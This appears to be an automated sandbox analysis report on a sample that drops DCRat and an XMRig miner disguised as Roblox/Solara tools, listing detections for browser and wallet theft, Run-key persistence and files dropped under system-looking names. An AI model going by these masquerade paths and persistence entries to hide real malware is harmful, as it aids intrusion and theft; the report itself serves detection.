Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Event Triggered Execution: AppInit DLLs

persistence privilege_escalation

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\System32\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Cursors\smss.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\faildsfsdf = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\sobql9.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Internet Explorer\ja-JP\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Internet Explorer\ja-JP\CSC7EF3102F42B4454780319C960827883.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\WindowsPowerShell\dllhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\WindowsPowerShell\dllhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Uninstall Information\1143e5710f078d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\unsecapp.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\29c1c3cc0f7685 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\CSC7A0F739559C14E76B9FCB2905B968626.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\WindowsPowerShell\CSCBA97CDFE29334993A62C13D44C919133.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\WindowsPowerShell\5940a34987c991 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Uninstall Information\SolaraBootstrapper.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Program Files (x86)\Windows Defender\ja-JP\1143e5710f078d C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Uninstall Information\CSC7DE149071344984BABDF789467E5B10.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
